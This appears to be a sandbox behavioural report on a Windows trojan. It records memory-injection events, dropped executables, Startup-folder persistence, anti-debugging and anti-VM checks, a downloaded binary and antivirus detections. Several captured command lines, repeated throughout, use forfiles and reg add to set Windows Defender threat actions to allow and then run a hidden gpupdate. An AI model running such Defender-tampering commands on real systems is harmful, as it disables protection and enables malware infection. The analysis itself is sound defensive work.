NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2340 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x709a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2340 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70801000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2340 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x707d1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2340 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75291000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2340 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2340 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x105d6000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x707d1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75291000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x703e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x702e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70391000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x702d1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70b61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74672000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 region_size: 262144 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02480000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02480000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fd21000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fce4000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fd21000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0264a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fd22000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02481000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02482000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02653000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02654000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02687000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2140 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0264b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (8 events)

file	C:\Users\test22\AppData\Local\2UuVAtmjLx7l1otCRUqPqmbZ.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\on4lsEWFP5S3BYZqH9VhlFbH.bat
file	C:\Users\test22\Pictures\PVxQ006P3ViJx91yQ0kRztj8.exe
file	C:\Users\test22\AppData\Local\Ud9WaJT4i8EoA2aHBSB1VWQO.exe
file	C:\Users\test22\Pictures\oGMrVNo8MvswPsMem9YEkgFm.exe
file	C:\Users\test22\AppData\Local\Temp\7zSCFCE.tmp\Install.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w15mrXgHAkyAcT7dJJkculm7.bat
file	C:\Users\test22\AppData\Local\Temp\7zSCCF0.tmp\Install.exe

Creates a shortcut to an executable file (1 event)

file	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (5 events)

cmdline	powershell start-process -WindowStyle Hidden gpupdate.exe /force
cmdline	forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	cmd /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\2UuVAtmjLx7l1otCRUqPqmbZ.exe
file	C:\Users\test22\AppData\Local\Ud9WaJT4i8EoA2aHBSB1VWQO.exe

WaitFor has been invoked (possibly to delay malicious activity)

Executes one or more WMI queries (1 event)

wmi	<INVALID POINTER>

A process created a hidden window (8 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Aug. 18, 2024, 2:11 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\oGMrVNo8MvswPsMem9YEkgFm.exe parameters: filepath: C:\Users\test22\Pictures\oGMrVNo8MvswPsMem9YEkgFm.exe	1	1
ShellExecuteExW Aug. 18, 2024, 2:11 p.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\PVxQ006P3ViJx91yQ0kRztj8.exe parameters: filepath: C:\Users\test22\Pictures\PVxQ006P3ViJx91yQ0kRztj8.exe	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2408 thread_handle: 0x0000028c process_identifier: 2404 current_directory: C:\Users\test22\AppData\Local\Temp\7zSCFCE.tmp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000318	1	1
ShellExecuteExW Aug. 18, 2024, 2:11 p.m.	show_type: 0 filepath_r: cmd parameters: /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" filepath: cmd	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 3060 thread_handle: 0x0000012c process_identifier: 3056 current_directory: C:\Users\test22\AppData\Local\Temp\7zSCFCE.tmp filepath: C:\Windows\System32\forfiles.exe track: 1 command_line: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" filepath_r: C:\Windows\system32\forfiles.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000130	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2116 thread_handle: 0x0000011c process_identifier: 2108 current_directory: filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000120	1	1
CreateProcessInternalW Aug. 18, 2024, 2:11 p.m.	thread_identifier: 2136 thread_handle: 0x0000012c process_identifier: 2140 current_directory: c:\windows\system32 filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell start-process -WindowStyle Hidden gpupdate.exe /force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000130	1	1
ShellExecuteExW Aug. 18, 2024, 2:11 p.m.	show_type: 0 filepath_r: C:\Windows\system32\gpupdate.exe parameters: /force filepath: C:\Windows\System32\gpupdate.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 2340 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 1441792 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x10001000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 18, 2024, 2:11 p.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process caspol.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv Aug. 18, 2024, 2:11 p.m.	buffer: HTTP/1.1 200 OK Date: Sun, 18 Aug 2024 05:11:23 GMT Server: nginx/1.26.1 Content-Type: application/x-dosexec Content-Length: 270336 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $°FAô÷(ô÷(ô÷(ê¥¬é÷(ê¥½ç÷(ê¥«¬÷(Ó1Sñ÷(ô÷)÷(ê¥¢õ÷(ê¥¼õ÷(ê¥¹õ÷(Richô÷(PELÜwHdà 4äcP@@à´f<¸¨Pl.text24 `.rdataP 8@@.data¸pX@À.rsrc¸¨ªv@@ÿ%4PB; pBuóÃéXjhdBèKuötu=°qCuCjè< YeüVèd YEäÀt VPè YYÇEüþÿÿÿè}äu7ÿuë jè( YÃVjÿ5BÿPBÀuè)ðÿTPBPèÙYèÃÿUìQeüVEüPÿuÿuèðÄöu9EütèåÀt èÜMüÆ^ÉÃÿUìEVñÆFÀucèN$FHlHhN; °xBt ÌwBHpuèé F;ÐvBtF ÌwBHpuè]FFö@puHpÆFë @FÆ^]ÂÿUìì3ÉWø;ñt3Àf;Ùy9Mp8hÿuMðè?ÿÿÿEðxu.ötf¶fEÀtÇ}ü;Eø`pýé/?t~O¸¬~23ÉöÁQVjWj ÿpÿPBÀt'EÀt²Mð¬ë¥'èÇöt3ÀfEÀtÿèo}üºMøapýé®EðP¶Pè´%YYÀtZMð¬9EsEÀ7ÿÿÿÇþÿÿÿé,ÿÿÿø~3ÒöÂRVPSj ÿqÿPBÀPÿÿÿ{FÿÿÿéUÿÿÿ3ÀöÀ3ÿGPEðVWSj ÿpÿPBÀ4ÿÿÿEÀËþÿÿ8éÄþÿÿE;Át3À_ÉÃÿUìQEMüÿÀu¸`BS]VjÿuMüQ3öè0þÿÿEüÄ^[ÉÃjh dBèeäu;5 qCw"jèYeüVèYEäÇEüþÿÿÿè Eäè(Ãjè YÃÿUìVuþà¡SW=PB=BuèÜjè)hÿèl&YY¡°qCøuötÆë3À@PëøuVèSÿÿÿYÀuöuFÆæðVjÿ5Bÿ×ØÛu.j^9BtÿuèºYÀtué{ÿÿÿè~0èw0_Ã[ëVè*YècÇ3À^]ÃÿUìj jÿuèÈ,Ä]ÃÿUì]éßÿÿÿÿUìQSVWÿ5qCèkÿ5qCø}üè[ðYY;÷Þ+ßCørwWè-øCY;øsH¸;øsÇÇ;ÇrPÿuüè-YYÀuG;Çr@Pÿuüèø,YYÀt1ÁûP4èvY£qCÿuèhÆVè]Y£qCEYë3À_^[ÉÃÿVjj èb,ðVè6Ä£qC£qCöujX^Ã&3À^Ãjh@dBè÷èÖ$eüÿuèøþÿÿYEäÇEüþÿÿÿè EäèÃèµ$ÃÿUìÿuè·ÿÿÿ÷ØÀ÷ØYH]ÃÿUì=lBuèÈ(ÿuè'hÿèW$YY]ÃjXh`dBè{3öuüEPÿ¤PBjþ_}ü¸MZf9@u8¡<@¸@PEu'¹f9@u¸t@v3É9°è@ÁMäëuä3ÛCSèpYÀujèXÿÿÿYè( ÀujèGÿÿÿYè65]üèÚ2À}jèV#Yÿ PB£´qCè1£dBè received: 2920 socket: 1612	1	2920	0

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x000d0400', u'virtual_address': u'0x001a7000', u'entropy': 6.845897098393395, u'name': u'.rdata', u'virtual_size': u'0x000d02e8'}

entropy

6.84589709839

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00003200', u'virtual_address': u'0x0029c000', u'entropy': 7.812445111811986, u'name': u'.rsrc', u'virtual_size': u'0x000030bc'}

entropy

7.81244511181

description

A section with a high entropy has been found

entropy

0.382146892655

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 18, 2024, 2:11 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Aug. 18, 2024, 2:11 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Potentially malicious URLs were found in the process memory dump (1 event)

url	https://docs.microsoft.com/windows/win32/fileio/maximum-file-path-limitation

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (14 events)

cmdline	forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
cmdline	cmd /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
cmdline	"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
cmdline	forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
cmdline	forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
cmdline	reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
cmdline	/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

Communicates with host for which no DNS query was performed (2 events)

host	194.58.114.223
host	91.121.59.207

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Aug. 18, 2024, 2:11 p.m.	process_identifier: 776 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000000000000144	1	0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Aug. 18, 2024, 2:11 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Checks the version of Bios, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion

Installs itself for autorun at Windows startup (2 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\on4lsEWFP5S3BYZqH9VhlFbH.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w15mrXgHAkyAcT7dJJkculm7.bat

File has been identified by 11 AntiVirus engines on VirusTotal as malicious (11 events)

Bkav	W64.AIDetectMalware
Elastic	malicious (high confidence)
Cybereason	malicious.f44892
APEX	Malicious
Rising	Trojan.Injector!1.FCBE (CLASSIC)
Google	Detected
Gridinsoft	Trojan.Heur!.02212023
Microsoft	Program:Win32/Wacapew.C!ml
Ikarus	Trojan.Win64.Crypt
